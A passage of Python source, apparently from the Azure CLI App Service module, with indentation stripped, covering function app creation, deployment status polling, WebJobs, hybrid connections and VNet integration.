plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.begin_create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
def create_functionapp(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None, vnet=None, subnet=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 3. In the future, specifying a version will "
"be required. To create a 3.x function you would pass in the flag `--functions-version 3`")
functions_version = '3'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
from azure.mgmt.web.models import Site
SiteConfig, NameValuePair = cmd.get_models('SiteConfig', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
site_config = SiteConfig(app_settings=[])
client = web_client_factory(cmd.cli_ctx)
if vnet or subnet:
if plan:
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
webapp_location = plan_info.location
else:
webapp_location = consumption_plan_location
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
_validate_vnet_integration_location(cmd=cmd, webapp_location=webapp_location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"])
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
site_config.vnet_route_all_enabled = True
subnet_resource_id = subnet_info["subnet_resource_id"]
else:
subnet_resource_id = None
functionapp_def = Site(location=None, site_config=site_config, tags=tags,
virtual_network_subnet_id=subnet_resource_id)
KEYS = FUNCTIONS_STACKS_API_KEYS()
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
if runtime is None and runtime_version is not None:
raise CLIError('Must specify --runtime to use --runtime-version')
# get the matching runtime stack object
runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
if not runtime_json:
# no matching runtime for os
os_string = "linux" if is_linux else "windows"
supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
.format(os_string, ', '.join(supported_runtimes)))
runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
functions_version,
runtime_version,
is_linux)
if not runtime_version_json:
supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
_get_supported_runtime_versions_functionapp(runtime_json,
functions_version)))
if runtime_version:
if runtime == 'dotnet':
raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
.format(runtime_version, functions_version))
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions-version {}. Supported versions are: {}.'
.format(runtime_version,
runtime,
functions_version,
', '.join(supported_runtime_versions)))
# if runtime_version was not specified, then that runtime is not supported for that functions version
raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
'--functions-version {}'
.format(runtime, functions_version))
if runtime == 'dotnet':
logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
'--functions-version. Dotnet version will be %s for this function app.',
runtime_version_json[KEYS.DISPLAY_VERSION])
if runtime_version_json[KEYS.IS_DEPRECATED]:
logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
'Please update your command to use a more recent version. For a list of supported '
'--runtime-versions, run \"az functionapp create -h\"',
runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION])
site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
app_settings_json = {}
# ensure that app insights is created if not disabled
runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_json.items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# temporary workaround for dotnet-isolated linux consumption apps
if is_linux and consumption_plan_location is not None and runtime == 'dotnet-isolated':
site_config.linux_fx_version = ''
# adding app settings
for app_setting, value in app_settings_json.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or consumption, we need these app settings
if is_plan_elastic_premium(cmd, plan_info) or consumption_plan_location is not None:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=_get_content_share_name(name)))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
create_app_insights = True
poller = client.web_apps.begin_create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
if is_linux:
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
KEYS = FUNCTIONS_STACKS_API_KEYS()
matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
if matching_runtime_json:
return matching_runtime_json[0]
return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
supported_versions_list = []
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
supported_versions_list.append(runtime_version_json)
return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
if runtime_version:
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
return runtime_version_json
return None
# find the matching default runtime version
supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
default_version_json = {}
default_version = 0.0
for current_runtime_version_json in supported_versions_list:
if current_runtime_version_json[KEYS.IS_DEFAULT]:
current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION],
is_linux)
if not default_version_json or default_version < current_version:
default_version_json = current_runtime_version_json
default_version = current_version
return default_version_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
def _get_content_share_name(app_name):
# content share name should be up to 63 characters long, lowercase letter and digits, and random
# so take the first 50 characters of the app name and add the last 12 digits of a random uuid
share_name = app_name[0:50]
suffix = str(uuid.uuid4()).split('-')[-1]
return share_name.lower() + suffix
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
# We make this success message as a warning to no interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS', 'Standard_GZRS'] # pylint: disable=line-too-long
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
logger.warning(n.name)
if n.name == namespace:
hy_co_id = n.id
if hy_co_id == '':
raise ResourceNotFoundError('Azure Service Bus Relay namespace {} was not found.'.format(namespace))
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot, hc)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# enures input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
# reformats the vnet entry, removing unecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_webapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check, True)
def add_functionapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None,
skip_delegation_check=False):
return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check, False)
def _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False,
is_webapp=True):
from azure.mgmt.web.models import SitePatchResource
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
client = web_client_factory(cmd.cli_ctx)
if is_webapp:
app = show_webapp(cmd, resource_group_name, name, slot)
else:
app = show_functionapp(cmd, resource_group_name, name, slot)
parsed_plan = parse_resource_id(app.app_service_plan_id)
plan_info = client.app_service_plans.get(parsed_plan['resource_group'], parsed_plan["name"])
_validate_vnet_integration_location(cmd=cmd, webapp_location=plan_info.location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"])
if skip_delegation_check:
logger.warning('Skipping delegation check. Ensure that subnet is delegated to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
else:
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
subnet_id = subnet_info["subnet_resource_id"]
if not slot:
client.web_apps.update(resource_group_name=resource_group_name,
name=name,
site_envelope=SitePatchResource(virtual_network_subnet_id=subnet_id))
else:
client.web_apps.update_slot(resource_group_name=resource_group_name,
name=name,
slot=slot,
site_envelope=SitePatchResource(virtual_network_subnet_id=subnet_id))
# Enable Route All configuration
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.vnet_route_all_enabled is not True:
config = update_site_configs(cmd, resource_group_name, name, slot=slot, vnet_route_all_enabled='true')
return {
"id": subnet_info["vnet_resource_id"],
"location": plan_info.location, # must be the same as vnet location bc of validation check
"name": subnet_info["vnet_name"],
